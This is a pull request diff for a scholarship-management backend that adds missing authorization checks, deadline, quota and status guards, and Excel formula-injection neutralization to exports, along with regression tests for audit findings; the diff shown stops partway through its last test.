### PR TITLE
fix: close authorization-scoping gaps + Excel formula injection (audit follow-up)

### DIFF
--- a/backend/app/api/v1/endpoints/applications.py
+++ b/backend/app/api/v1/endpoints/applications.py
@@ -1057,6 +1057,14 @@ async def get_application_document_file(
     if not is_owner and not is_staff:
         raise HTTPException(status_code=403, detail="無權限")
 
+    # SECURITY: a blanket "professor" role match is not enough -- mirrors files.py,
+    # which requires an actual advising relationship. Without this, any professor
+    # account could download any student's application document regardless of
+    # whether they advise that student.
+    if not is_owner and current_user.role == UserRole.professor:
+        if not current_user.can_access_student_data(application.user_id, "view_applications"):
+            raise HTTPException(status_code=403, detail="無權限 - 與該學生無指導關係")
+
     if not application.application_document_url:
         raise HTTPException(status_code=404, detail="申請文件不存在")
 

--- a/backend/app/api/v1/endpoints/college_review/application_review.py
+++ b/backend/app/api/v1/endpoints/college_review/application_review.py
@@ -11,11 +11,13 @@ import logging
 from typing import Optional
 
 from fastapi import APIRouter, Depends, HTTPException, Query, Request, status
+from sqlalchemy import select
 from sqlalchemy.exc import DatabaseError
 from sqlalchemy.ext.asyncio import AsyncSession
 
 from app.core.security import require_college, require_roles
 from app.db.deps import get_db
+from app.models.application import Application
 
 # Note: CollegeReview model removed - replaced by unified ApplicationReview system
 # from app.models.college_review import CollegeReview
@@ -24,6 +26,7 @@ from app.schemas.college_review import StudentTermData
 from app.schemas.response import ApiResponse
 from app.services.college_review_service import CollegeReviewService, ReviewPermissionError
 from app.services.student_service import StudentService
+from app.utils.application_helpers import get_college_code_from_data
 from app.utils.pii_masking import mask_id_number
 
 from ._helpers import _check_academic_year_permission, _check_scholarship_permission
@@ -153,6 +156,34 @@ async def get_student_preview(
 
     try:
         logger.info(f"User {current_user.id} requesting preview for student {student_id}")
+
+        # SECURITY: college users may only preview students they actually manage --
+        # i.e. a student with at least one application in the caller's own college.
+        # Without this, any college account could enumerate the whole student body's
+        # SIS PII by student number, using 404-vs-200 as an existence oracle.
+        #
+        # Join through User.nycu_id (the authoritative identity column -- for
+        # students this *is* their 學號/std_stdcode) rather than filtering the
+        # student_data JSON snapshot in SQL, so this narrows to a handful of
+        # candidate rows via an indexed column and stays portable across DB
+        # dialects; the college_code check on the snapshot then happens in Python.
+        if current_user.role == UserRole.college:
+            candidates_stmt = (
+                select(Application.student_data)
+                .join(User, User.id == Application.user_id)
+                .where(User.nycu_id == student_id)
+            )
+            candidate_rows = (await db.execute(candidates_stmt)).scalars().all()
+            is_managed = any(
+                get_college_code_from_data(student_data) == current_user.college_code
+                for student_data in candidate_rows
+                if student_data
+            )
+            if not is_managed:
+                raise HTTPException(
+                    status_code=status.HTTP_403_FORBIDDEN,
+                    detail="You do not manage an application for this student",
+                )
 
         # Initialize student service
         student_service = StudentService()

--- a/backend/app/api/v1/endpoints/college_review/distribution.py
+++ b/backend/app/api/v1/endpoints/college_review/distribution.py
@@ -33,7 +33,7 @@ from app.services.college_review_service import (
     CollegeReviewService,
 )
 
-from ._helpers import normalize_semester_value
+from ._helpers import assert_can_manage_ranking, normalize_semester_value
 
 logger = logging.getLogger(__name__)
 
@@ -88,11 +88,20 @@ async def get_ranking_roster_status(
     查詢排名的造冊狀態和進展
     """
     try:
+        ranking = await db.get(CollegeRanking, ranking_id)
+        if not ranking:
+            raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found")
+        # SECURITY: college-scope this like every other by-ranking-id endpoint --
+        # otherwise any college user can enumerate another college's roster status.
+        assert_can_manage_ranking(ranking, current_user)
+
         service = CollegeReviewService(db)
         roster_status = await service.check_ranking_roster_status(ranking_id)
 
         return ApiResponse(success=True, message="Roster status retrieved successfully", data=roster_status)
 
+    except HTTPException:
+        raise
     except Exception as e:
         logger.exception(f"Error retrieving roster status for ranking {ranking_id}")
         raise HTTPException(
@@ -130,6 +139,10 @@ async def get_distribution_details(
 
         if not ranking:
             raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Ranking not found")
+        # SECURITY: rankings are single-college; without this a College-A account could
+        # pass a College-B ranking_id and read that college's applicant PII, ranks, and
+        # rejection reasons (mirrors get_ranking in ranking_management.py).
+        assert_can_manage_ranking(ranking, current_user)
 
         sub_type_metadata_map: Dict[str, Dict[str, str]] = {}
         if ranking.scholarship_type and getattr(ranking.scholarship_type, "sub_type_configs", None):

--- a/backend/app/api/v1/endpoints/college_review/ranking_management.py
+++ b/backend/app/api/v1/endpoints/college_review/ranking_management.py
@@ -1032,6 +1032,12 @@ async def import_ranking_from_excel(
         # Check permissions - the owning college's reviewers or an admin can import
         assert_can_manage_ranking(ranking, current_user)
 
+        # SECURITY: every other ranking-mutation endpoint (create/update-order/
+        # finalize/unfinalize) enforces the #63 college-review deadline; this was
+        # the one write path that omitted it, letting a college user reorder
+        # ranks / flip college_rejected via import after the deadline.
+        await CollegeReviewService(db).assert_ranking_within_deadline_by_ranking(ranking_id, current_user)
+
         if ranking.is_finalized:
             raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail="Cannot modify finalized ranking")
 
@@ -1166,6 +1172,8 @@ async def import_ranking_from_excel(
 
     except HTTPException:
         raise
+    except AuthorizationError as e:
+        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=str(e)) from e
     except Exception as e:
         logger.exception("Error importing ranking data")
         raise HTTPException(

--- a/backend/app/api/v1/endpoints/professor.py
+++ b/backend/app/api/v1/endpoints/professor.py
@@ -239,6 +239,19 @@ async def update_professor_review(
         if existing_review.application_id != application_id:
             raise AuthorizationError("Review does not belong to the specified application")
 
+        # SECURITY: a terminal reject (status=rejected) must stay terminal for the
+        # professor. assert_professor_review_unlocked alone doesn't catch this --
+        # review_stage after a reject is "professor_reviewed", which is deliberately
+        # NOT in the college-review lock set, so without this check a professor could
+        # PUT their own rejected review back to approve after the fact.
+        from app.core.config import settings
+
+        service = ApplicationService(db)
+        if not settings.bypass_time_restrictions and not await service.can_professor_submit_review(
+            application_id, current_user.id
+        ):
+            raise AuthorizationError("Professor not authorized to update review at this time or for this application")
+
         # Block professor edits once the college has started reviewing (#64).
         await review_service.assert_professor_review_unlocked(application_id, current_user)
 

--- a/backend/app/api/v1/endpoints/reviews.py
+++ b/backend/app/api/v1/endpoints/reviews.py
@@ -15,6 +15,7 @@ from sqlalchemy.exc import DatabaseError, IntegrityError
 from sqlalchemy.ext.asyncio import AsyncSession
 from sqlalchemy.orm import joinedload
 
+from app.core.exceptions import AuthorizationError, NotFoundError
 from app.core.security import get_current_user
 from app.db.deps import get_db
 from app.models.application import Application
@@ -24,6 +25,7 @@ from app.models.user import User
 from app.schemas.response import ApiResponse
 from app.schemas.review import ReviewCreate, ReviewItemResponse, ReviewResponse, ReviewSubmitRequest
 from app.services.application_audit_service import ApplicationAuditService
+from app.services.application_service import ApplicationService
 from app.services.review_service import ReviewService
 
 logger = logging.getLogger(__name__)
@@ -214,8 +216,11 @@ async def get_application_reviews(
     """
     取得申請的所有審查記錄
     """
-    # 檢查申請是否存在
-    application = await db.get(Application, application_id)
+    # SECURITY: scope to the same access rule the rest of the app uses to view an
+    # application (student must own it, professor must be assigned, college/admin
+    # pass through) -- without this, any authenticated student could read other
+    # students' reviewer identities, recommendations, and rejection comments.
+    application = await ApplicationService(db).get_viewable_application(application_id, current_user)
     if not application:
         raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="申請不存在")
 
@@ -276,8 +281,10 @@ async def get_application_review_status(
     """
     review_service = ReviewService(db)
 
-    # 檢查申請是否存在
-    application = await db.get(Application, application_id)
+    # SECURITY: same access-scoping as get_application_reviews above -- see that
+    # endpoint's comment. decision_reason and subtype_statuses (rejector identity +
+    # rejection comments) are equally sensitive.
+    application = await ApplicationService(db).get_viewable_application(application_id, current_user)
     if not application:
         raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="申請不存在")
 
@@ -434,9 +441,29 @@ async def submit_application_review(
     if application_id <= 0:
         raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="Invalid application ID")
 
+    # SECURITY: professors must pass the same assignment / terminal-status / review-window
+    # checks that the dedicated professor.py review endpoint enforces. Without this, any
+    # professor could review or reject an application they aren't assigned to, or reverse
+    # their own terminal reject after the fact via this parallel multi-role endpoint.
+    if current_user.is_professor():
+        from app.core.config import settings
+
+        application_service = ApplicationService(db)
+        if not settings.bypass_time_restrictions and not await application_service.can_professor_submit_review(
+            application_id, current_user.id
+        ):
+            raise HTTPException(
+                status_code=status.HTTP_403_FORBIDDEN,
+                detail="Professor not authorized to submit review at this time or for this application",
+            )
+
     try:
         # Use unified ReviewService for creating/updating reviews
         review_service = ReviewService(db)
+
+        if current_user.is_professor():
+            # Block professor edits once college review has started (#64), same as professor.py.
+            await review_service.assert_professor_review_unlocked(application_id, current_user)
 
         # Get reviewable sub-types for this user to validate permissions
         reviewable_subtypes = await review_service.get_reviewable_subtypes(application_id, current_user.role)
@@ -539,6 +566,10 @@ async def submit_application_review(
     except HTTPException:
         # Re-raise FastAPI HTTPException as-is (preserves status code and detail)
         raise
+    except NotFoundError as e:
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=str(e)) from e
+    except AuthorizationError as e:
+        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=str(e)) from e
     except ValueError as e:
         logger.warning(f"Invalid review data for application {application_id}", exc_info=True)
         raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="Invalid review data") from e

--- a/backend/app/services/application_service.py
+++ b/backend/app/services/application_service.py
@@ -942,6 +942,16 @@ class ApplicationService:
 
         return application
 
+    async def get_viewable_application(self, application_id: int, current_user: User) -> Application | None:
+        """Get the raw Application model if current_user may view it, else None.
+
+        Same access rule as get_application_by_id (student must own it, professor
+        must be assigned, college/admin/super_admin pass through) but without the
+        cost of building a full ApplicationResponse -- for callers (e.g. review
+        endpoints) that only need the authorization gate.
+        """
+        return await self._get_application_model(application_id, current_user)
+
     async def get_application_by_id(self, application_id: int, current_user: User):
         """Get application by ID with proper access control and formatted response"""
         # Use internal method to get the application model

--- a/backend/app/services/college_ranking_export_service.py
+++ b/backend/app/services/college_ranking_export_service.py
@@ -31,6 +31,7 @@ from reportlab.lib.units import mm
 from reportlab.platypus import KeepInFrame, Paragraph, SimpleDocTemplate, Spacer, Table, TableStyle
 
 from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
+from app.utils.excel_safety import excel_safe_cell_value
 
 # Static columns shared by the xlsx and PDF exports: (header label, PDF column
 # weight). STATIC_HEADERS and the PDF weight vector are both derived from this one
@@ -120,11 +121,14 @@ class CollegeRankingExportService:
             cell.alignment = Alignment(horizontal="center", vertical="center", wrap_text=True)
             cell.fill = PatternFill("solid", fgColor="DDDDDD")
 
-        # Data rows — written from the same _row_cells used by the PDF export
+        # Data rows — written from the same _row_cells used by the PDF export.
+        # excel_safe_cell_value neutralizes formula injection (see its docstring)
+        # -- applied only here, not inside _row_cells, so the PDF export (which
+        # can't execute formulas) keeps rendering the raw text unprefixed.
         for idx, row in enumerate(rows, start=1):
             excel_row = idx + 2  # +2 because rows 1-2 are title/header
             for col_idx, value in enumerate(self._row_cells(row, idx, sub_type_labels, sorted_dynamic), start=1):
-                ws.cell(row=excel_row, column=col_idx, value=value)
+                ws.cell(row=excel_row, column=col_idx, value=excel_safe_cell_value(value))
 
         max_row = len(rows) + 2
         self._apply_borders(ws, max_row=max_row, max_col=total_cols)

--- a/backend/app/services/excel_export_service.py
+++ b/backend/app/services/excel_export_service.py
@@ -24,6 +24,7 @@ from app.models.payment_roster import (
     StudentVerificationStatus,
 )
 from app.services.minio_service import MinIOService
+from app.utils.excel_safety import excel_safe_cell_value
 
 logger = logging.getLogger(__name__)
 
@@ -777,7 +778,7 @@ class ExcelExportService:
             for row_idx, (row_data, fills) in enumerate(zip(excel_data, cell_fills, strict=True), start=start_row):
                 for col_idx, column_name in enumerate(columns, start=1):
                     value = row_data.get(column_name, "")
-                    cell = ws.cell(row=row_idx, column=col_idx, value=value)
+                    cell = ws.cell(row=row_idx, column=col_idx, value=excel_safe_cell_value(value))
 
                     if column_name in self.NUMERIC_FORMAT_COLUMNS and isinstance(value, (int, float)):
                         cell.number_format = "#,##0"

--- a/backend/app/services/manual_distribution_service.py
+++ b/backend/app/services/manual_distribution_service.py
@@ -1503,6 +1503,19 @@ class ManualDistributionService:
             if ri.allocated_sub_type:
                 ri.is_allocated = True
 
+        # SECURITY: allocate/finalize both gate on _assert_round_not_oversubscribed
+        # before committing an allocation -- restore skipped it, so a
+        # revoke-then-reallocate-then-restore sequence could double-book a
+        # single quota slot (both the reallocated winner and the restored
+        # application counted as is_allocated=True) with no DB-level guard.
+        if app.scholarship_configuration_id is not None:
+            config_result = await self.db.execute(
+                select(ScholarshipConfiguration).where(ScholarshipConfiguration.id == app.scholarship_configuration_id)
+            )
+            requesting_config = config_result.scalar_one_or_none()
+            if requesting_config is not None:
+                await self._assert_round_not_oversubscribed(requesting_config)
+
         # Audit logging moved to the endpoint (ApplicationAuditService.
         # log_application_restore) so the row carries the acting User +
         # request IP/UA and the action lives in the AuditAction enum (G18).

--- a/backend/app/services/roster_service.py
+++ b/backend/app/services/roster_service.py
@@ -2377,6 +2377,21 @@ class RosterService:
         if item.is_included:
             raise ConflictError("明細未被移除，無需回復")
 
+        # SECURITY: reconcile_roster's add path requires application.status ==
+        # approved before re-including an item; restore_item skipped that
+        # re-check, so an item removed while its application was still approved
+        # but since withdrawn/rejected/revoked/suspended (all -> a non-approved
+        # status) could be silently restored into a LOCKED roster, inflating the
+        # student's received_months count (feeds the PhD 36-month cap).
+        from app.models.application import ApplicationStatus
+
+        if item.application is None or item.application.status != ApplicationStatus.approved:
+            current_status = item.application.status.value if item.application else "unknown"
+            raise ValueError(
+                f"Item {item_id}'s application is no longer approved (status={current_status}); "
+                "cannot restore to the roster"
+            )
+
         item.is_included = True
         item.exclusion_reason = None
         self.db.flush()

--- a/backend/app/services/whitelist_excel_service.py
+++ b/backend/app/services/whitelist_excel_service.py
@@ -10,6 +10,8 @@ from openpyxl import Workbook, load_workbook
 from openpyxl.styles import Alignment, Border, Font, PatternFill, Side
 from openpyxl.utils import get_column_letter
 
+from app.utils.excel_safety import excel_safe_cell_value
+
 logger = logging.getLogger(__name__)
 
 
@@ -66,10 +68,10 @@ class WhitelistExcelService:
         row = 2
         for sub_type, students in whitelist_data.items():
             for student in students:
-                ws.cell(row=row, column=1).value = student.get("nycu_id", "")
-                ws.cell(row=row, column=2).value = student.get("name", "")
-                ws.cell(row=row, column=3).value = sub_type
-                ws.cell(row=row, column=4).value = student.get("note", "")
+                ws.cell(row=row, column=1).value = excel_safe_cell_value(student.get("nycu_id", ""))
+                ws.cell(row=row, column=2).value = excel_safe_cell_value(student.get("name", ""))
+                ws.cell(row=row, column=3).value = excel_safe_cell_value(sub_type)
+                ws.cell(row=row, column=4).value = excel_safe_cell_value(student.get("note", ""))
 
                 # 應用樣式
                 for col_idx in range(1, len(self.column_headers) + 1):

--- a/backend/app/tests/test_audit_low_severity_guards.py
+++ b/backend/app/tests/test_audit_low_severity_guards.py
@@ -1,0 +1,333 @@
+"""
+Regression tests for three LOW/LOW-MEDIUM findings from the same security
+audit (issue #1081):
+
+Finding H: POST /college-review/rankings/{id}/import-excel was the one
+ranking-mutation endpoint that omitted the #63 college-review deadline
+guard every sibling (create/update-order/finalize/unfinalize) enforces.
+
+Finding I: ManualDistributionService.restore_allocation didn't call
+_assert_round_not_oversubscribed (unlike allocate/finalize), so a
+revoke-then-reallocate-then-restore sequence could double-book a single
+quota slot with no DB-level guard.
+
+Finding K: RosterService.restore_item never re-checked
+application.status == approved before re-including an item (unlike
+reconcile_roster's add path), so an admin could restore an item whose
+application was since withdrawn/rejected/revoked/suspended.
+"""
+
+from datetime import datetime, timedelta, timezone
+
+import pytest
+import pytest_asyncio
+from sqlalchemy import select
+
+from app.core.exceptions import AuthorizationError
+from app.models.application import Application, ApplicationStatus
+from app.models.college_review import CollegeRanking, CollegeRankingItem
+from app.models.scholarship import ScholarshipConfiguration, SubTypeSelectionMode
+from app.models.user import User, UserRole, UserType
+from app.services.college_review_service import CollegeReviewService
+from app.services.manual_distribution_service import ManualDistributionService
+
+# ---------------------------------------------------------------------------
+# Finding H: ranking-import deadline guard
+# ---------------------------------------------------------------------------
+
+
+@pytest_asyncio.fixture
+async def college_user(db):
+    user = User(
+        nycu_id="authz_college_deadline",
+        name="College Deadline Tester",
+        email="authz_college_deadline@university.edu",
+        user_type=UserType.employee,
+        role=UserRole.college,
+        college_code="CS",
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+    return user
+
+
+class TestRankingImportDeadlineGuard:
+    @pytest.mark.asyncio
+    async def test_import_after_deadline_is_blocked_for_college_user(self, db, college_user):
+        cfg = ScholarshipConfiguration(
+            scholarship_type_id=1,
+            config_code="DEADLINE-TEST-114",
+            config_name="Deadline Test 114",
+            academic_year=114,
+            semester="first",
+            amount=50000,
+            college_review_end=datetime.now(timezone.utc) - timedelta(days=1),
+        )
+        db.add(cfg)
+        ranking = CollegeRanking(
+            scholarship_type_id=1,
+            sub_type_code="nstc",
+            academic_year=114,
+            semester="first",
+            college_code="CS",
+        )
+        db.add(ranking)
+        await db.commit()
+        await db.refresh(ranking)
+
+        service = CollegeReviewService(db)
+        with pytest.raises(AuthorizationError, match="已過排名截止時間"):
+            await service.assert_ranking_within_deadline_by_ranking(ranking.id, college_user)
+
+    @pytest.mark.asyncio
+    async def test_import_before_deadline_is_allowed(self, db, college_user):
+        cfg = ScholarshipConfiguration(
+            scholarship_type_id=1,
+            config_code="DEADLINE-TEST-115",
+            config_name="Deadline Test 115",
+            academic_year=115,
+            semester="first",
+            amount=50000,
+            college_review_end=datetime.now(timezone.utc) + timedelta(days=1),
+        )
+        db.add(cfg)
+        ranking = CollegeRanking(
+            scholarship_type_id=1,
+            sub_type_code="nstc",
+            academic_year=115,
+            semester="first",
+            college_code="CS",
+        )
+        db.add(ranking)
+        await db.commit()
+        await db.refresh(ranking)
+
+        service = CollegeReviewService(db)
+        # Should not raise.
+        await service.assert_ranking_within_deadline_by_ranking(ranking.id, college_user)
+
+
+# ---------------------------------------------------------------------------
+# Finding I: restore_allocation oversubscription guard
+# ---------------------------------------------------------------------------
+
+
+@pytest_asyncio.fixture
+async def admin_user_low_sev(db):
+    user = User(
+        nycu_id="authz_admin_low_sev",
+        name="Admin Low Sev",
+        email="authz_admin_low_sev@university.edu",
+        user_type=UserType.employee,
+        role=UserRole.admin,
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+    return user
+
+
+class TestRestoreAllocationOversubscriptionGuard:
+    @pytest.mark.asyncio
+    async def test_restore_into_already_full_quota_is_rejected(self, db, admin_user_low_sev):
+        cfg = ScholarshipConfiguration(
+            scholarship_type_id=1,
+            config_code="OVERSUB-TEST-114",
+            config_name="Oversubscription Test 114",
+            academic_year=114,
+            semester="first",
+            amount=50000,
+            quotas={"nstc": 1},
+        )
+        db.add(cfg)
+        await db.commit()
+        await db.refresh(cfg)
+
+        # Two distinct students -- Application has a unique constraint on
+        # (user_id, scholarship_type_id, academic_year, semester).
+        student_a = User(
+            nycu_id="authz_student_oversub_a",
+            name="Student Oversub A",
+            email="authz_student_oversub_a@university.edu",
+            user_type=UserType.student,
+            role=UserRole.student,
+        )
+        student_b = User(
+            nycu_id="authz_student_oversub_b",
+            name="Student Oversub B",
+            email="authz_student_oversub_b@university.edu",
+            user_type=UserType.student,
+            role=UserRole.student,
+        )
+        db.add_all([student_a, student_b])
+        await db.commit()
+        await db.refresh(student_a)
+        await db.refresh(student_b)
+
+        # Application A: previously revoked (its ranking item was freed by
+        # revoke, allocated_sub_type/allocation_config_id preserved).
+        app_a = Application(
+            user_id=student_a.id,
+            app_id="APP-OVERSUB-A",
+            scholarship_type_id=1,
+            scholarship_configuration_id=cfg.id,
+            academic_year=114,
+            semester="first",
+            status=ApplicationStatus.cancelled,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            sub_scholarship_type="nstc",
+            quota_allocation_status="revoked",
+            is_renewal=False,
+        )
+        db.add(app_a)
+
+        # Application B: currently allocated, occupying the only slot.
+        app_b = Application(
+            user_id=student_b.id,
+            app_id="APP-OVERSUB-B",
+            scholarship_type_id=1,
+            scholarship_configuration_id=cfg.id,
+            academic_year=114,
+            semester="first",
+            status=ApplicationStatus.approved,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            sub_scholarship_type="nstc",
+            quota_allocation_status="allocated",
+            is_renewal=False,
+        )
+        db.add(app_b)
+        await db.commit()
+        await db.refresh(app_a)
+        await db.refresh(app_b)
+
+        ranking = CollegeRanking(scholarship_type_id=1, sub_type_code="nstc", academic_year=114, semester="first")
+        db.add(ranking)
+        await db.commit()
+        await db.refresh(ranking)
+
+        item_a = CollegeRankingItem(
+            ranking_id=ranking.id,
+            application_id=app_a.id,
+            rank_position=1,
+            is_allocated=False,  # freed by the earlier revoke
+            allocated_sub_type="nstc",
+            allocation_config_id=cfg.id,
+        )
+        item_b = CollegeRankingItem(
+            ranking_id=ranking.id,
+            application_id=app_b.id,
+            rank_position=2,
+            is_allocated=True,  # occupying the one available slot
+            allocated_sub_type="nstc",
+            allocation_config_id=cfg.id,
+        )
+        db.add_all([item_a, item_b])
+        await db.commit()
+
+        service = ManualDistributionService(db)
+        with pytest.raises(ValueError, match="配額超額"):
+            await service.restore_allocation(application_id=app_a.id, admin_user_id=admin_user_low_sev.id)
+
+
+# ---------------------------------------------------------------------------
+# Finding K: restore_item application-status re-check
+# ---------------------------------------------------------------------------
+
+
+class TestRosterRestoreItemStatusRecheck:
+    def test_restore_item_rejects_non_approved_application(self, db_sync, admin_user_low_sev):
+        # Note: RosterService uses the sync session (db_sync) -- a separate
+        # in-memory SQLite DB from the async `db` fixture -- so every row here
+        # (including the ScholarshipConfiguration) must be created via db_sync.
+        from app.models.payment_roster import (
+            PaymentRoster,
+            PaymentRosterItem,
+            RosterCycle,
+            RosterStatus,
+            RosterTriggerType,
+        )
+        from app.services.roster_service import RosterService
+
+        cfg = ScholarshipConfiguration(
+            scholarship_type_id=1,
+            config_code="ROSTER-RESTORE-114",
+            config_name="Roster Restore 114",
+            academic_year=114,
+            semester="first",
+            amount=50000,
+        )
+        db_sync.add(cfg)
+        db_sync.commit()
+        db_sync.refresh(cfg)
+
+        admin = User(
+            nycu_id="authz_admin_roster_sync",
+            name="Admin Roster Sync",
+            email="authz_admin_roster_sync@university.edu",
+            user_type=UserType.employee,
+            role=UserRole.admin,
+        )
+        db_sync.add(admin)
+        db_sync.commit()
+        db_sync.refresh(admin)
+
+        student = User(
+            nycu_id="authz_student_roster_sync",
+            name="Student Roster Sync",
+            email="authz_student_roster_sync@university.edu",
+            user_type=UserType.student,
+            role=UserRole.student,
+        )
+        db_sync.add(student)
+        db_sync.commit()
+        db_sync.refresh(student)
+
+        application = Application(
+            user_id=student.id,
+            app_id="APP-ROSTER-RESTORE",
+            scholarship_type_id=1,
+            academic_year=114,
+            semester="first",
+            # The application was withdrawn/rejected AFTER the item was
+            # removed from the roster -- no longer approved.
+            status=ApplicationStatus.rejected,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            sub_scholarship_type="nstc",
+        )
+        db_sync.add(application)
+        db_sync.commit()
+        db_sync.refresh(application)
+
+        roster = PaymentRoster(
+            scholarship_configuration_id=cfg.id,
+            academic_year=114,
+            period_label="114-1",
+            roster_cycle=RosterCycle.SEMI_YEARLY,
+            trigger_type=RosterTriggerType.MANUAL,
+            created_by=admin.id,
+            roster_code="TEST-ROSTER-RESTORE",
+            status=RosterStatus.LOCKED,
+        )
+        db_sync.add(roster)
+        db_sync.commit()
+        db_sync.refresh(roster)
+
+        item = PaymentRosterItem(
+            roster_id=roster.id,
+            application_id=application.id,
+            student_id_number="A123456789",
+            student_number=student.nycu_id,
+            student_name=student.name,
+            scholarship_name="Test Scholarship",
+            scholarship_amount=50000,
+            is_included=False,  # previously removed
+            exclusion_reason="manually removed",
+        )
+        db_sync.add(item)
+        db_sync.commit()
+        db_sync.refresh(item)
+
+        service = RosterService(db_sync)
+        with pytest.raises(ValueError, match="no longer approved"):
+            service.restore_item(roster_id=roster.id, item_id=item.id, admin_user_id=admin.id)

--- a/backend/app/tests/test_college_review_scoping_fixes.py
+++ b/backend/app/tests/test_college_review_scoping_fixes.py
@@ -1,0 +1,201 @@
+"""
+Regression tests for four missing-authorization-scope bugs found in the same
+security audit (issue #1081):
+
+Finding C: GET /college-review/rankings/{id}/distribution-details never scoped
+to the caller's college -- any college account could read another college's
+applicant PII, ranks, and rejection reasons by ranking-id.
+
+Finding D: GET /college-review/rankings/{id}/roster-status had the same
+missing-scope bug (operational metadata only, no PII).
+
+Finding E: GET /college-review/students/{student_id}/preview had no scope
+check at all despite its docstring claiming one -- any college account could
+read any student's SIS record.
+
+Finding F: GET /applications/{id}/application-document treated every
+professor as blanket staff, unlike the sibling files.py proxy which requires
+an actual advising relationship.
+
+Fix: C/D now call the same assert_can_manage_ranking helper the properly-
+scoped ranking_management.py endpoints already use. E now requires the
+target student to have an application in the caller's own college. F now
+requires can_access_student_data for professor callers, same as files.py.
+"""
+
+import pytest
+from httpx import AsyncClient
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app.core.security import get_current_user
+from app.main import app
+from app.models.college_review import CollegeRanking
+from app.models.user import User, UserRole, UserType
+
+
+async def _make_college_user(db: AsyncSession, nycu_id: str, college_code: str) -> User:
+    user = User(
+        nycu_id=nycu_id,
+        name=nycu_id,
+        email=f"{nycu_id}@university.edu",
+        user_type=UserType.employee,
+        role=UserRole.college,
+        college_code=college_code,
+    )
+    db.add(user)
+    await db.commit()
+    await db.refresh(user)
+    return user
+
+
+async def _make_ranking(db: AsyncSession, college_code: str) -> CollegeRanking:
+    ranking = CollegeRanking(
+        scholarship_type_id=1,
+        sub_type_code="default",
+        academic_year=113,
+        college_code=college_code,
+    )
+    db.add(ranking)
+    await db.commit()
+    await db.refresh(ranking)
+    return ranking
+
+
+class TestDistributionDetailsScoping:
+    @pytest.mark.asyncio
+    async def test_cross_college_distribution_details_is_forbidden(self, client: AsyncClient, db: AsyncSession):
+        college_a = await _make_college_user(db, "authz_college_a_1", "CS")
+        ranking_b = await _make_ranking(db, "EE")
+
+        app.dependency_overrides[get_current_user] = lambda: college_a
+        try:
+            response = await client.get(f"/api/v1/college-review/rankings/{ranking_b.id}/distribution-details")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 403
+
+    @pytest.mark.asyncio
+    async def test_own_college_distribution_details_is_allowed(self, client: AsyncClient, db: AsyncSession):
+        college_a = await _make_college_user(db, "authz_college_a_2", "CS")
+        ranking_a = await _make_ranking(db, "CS")
+
+        app.dependency_overrides[get_current_user] = lambda: college_a
+        try:
+            response = await client.get(f"/api/v1/college-review/rankings/{ranking_a.id}/distribution-details")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 200
+
+
+class TestRosterStatusScoping:
+    @pytest.mark.asyncio
+    async def test_cross_college_roster_status_is_forbidden(self, client: AsyncClient, db: AsyncSession):
+        college_a = await _make_college_user(db, "authz_college_a_3", "CS")
+        ranking_b = await _make_ranking(db, "EE")
+
+        app.dependency_overrides[get_current_user] = lambda: college_a
+        try:
+            response = await client.get(f"/api/v1/college-review/rankings/{ranking_b.id}/roster-status")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 403
+
+
+class TestStudentPreviewScoping:
+    @pytest.mark.asyncio
+    async def test_student_with_no_application_in_college_is_forbidden(self, client: AsyncClient, db: AsyncSession):
+        college_a = await _make_college_user(db, "authz_college_a_4", "CS")
+
+        app.dependency_overrides[get_current_user] = lambda: college_a
+        try:
+            response = await client.get("/api/v1/college-review/students/999999999/preview")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        assert response.status_code == 403
+
+    @pytest.mark.asyncio
+    async def test_student_with_application_in_own_college_passes_scope_check(
+        self, client: AsyncClient, db: AsyncSession, test_user: User, test_scholarship
+    ):
+        from app.models.application import Application
+        from app.models.scholarship import SubTypeSelectionMode
+
+        college_a = await _make_college_user(db, "authz_college_a_5", "CS")
+        application = Application(
+            user_id=test_user.id,
+            scholarship_type_id=test_scholarship.id,
+            sub_type_selection_mode=SubTypeSelectionMode.single,
+            status="submitted",
+            app_id="TEST-AUTHZ-PREVIEW",
+            academic_year=2024,
+            semester="first",
+            student_data={"std_stdcode": test_user.nycu_id, "std_academyno": "CS"},
+            submitted_form_data={},
+            agree_terms=True,
+        )
+        db.add(application)
+        await db.commit()
+
+        app.dependency_overrides[get_current_user] = lambda: college_a
+        try:
+            response = await client.get(f"/api/v1/college-review/students/{test_user.nycu_id}/preview")
+        finally:
+            del app.dependency_overrides[get_current_user]
+
+        # Scope check passes; downstream SIS lookup then legitimately 404s in this
+        # test environment (no external student API) or 500s attempting the call --
+        # what matters is it's NOT the 403 the scope gate would raise.
+        assert response.status_code != 403
+
+
+class TestApplicationDocumentProfessorScoping:
+    @pytest.mark.asyncio
+    async def test_unrelated_professor_cannot_download_document(
+        self, client: AsyncClient, db: AsyncSession, test_user: User, test_scholarship
+    ):
+        from app.models.application import Application
+        from app.models.scholarship import SubTypeSelectionMode
+
+        professor = User(
+            nycu_id="authz_prof_doc_1",
+            name="Prof Doc 1",
+            email="authz_prof_doc_1@university.edu",
+            user_type=UserType.employee,
+            role=UserRole.professor,
+        )
+        db.add(professor)
+        await db.commit()
+        await db.refresh(professor)
+        # can_access_student_data lazily iterates professor_relationships; force it
+        # to load now so the dependency-override object doesn't trigger an
+        # unawaited lazy-load (MissingGreenlet) inside the request.
+        await db.refresh(professor, attribute_names=["professor_relationships"])
+
